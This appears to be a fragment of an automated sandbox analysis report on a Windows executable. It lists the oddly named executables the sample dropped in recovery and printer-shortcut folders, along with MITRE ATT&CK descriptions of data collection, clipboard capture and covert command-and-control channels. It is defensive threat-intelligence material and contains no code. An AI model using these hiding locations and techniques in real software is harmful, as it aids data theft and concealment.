C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe:Zone.Identifier

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\33ddca35e40cf7

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hxpWOXgnBGVLArPcwqxpuA.exe

Windows Analysis Report
4Awb1u1GcJ.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre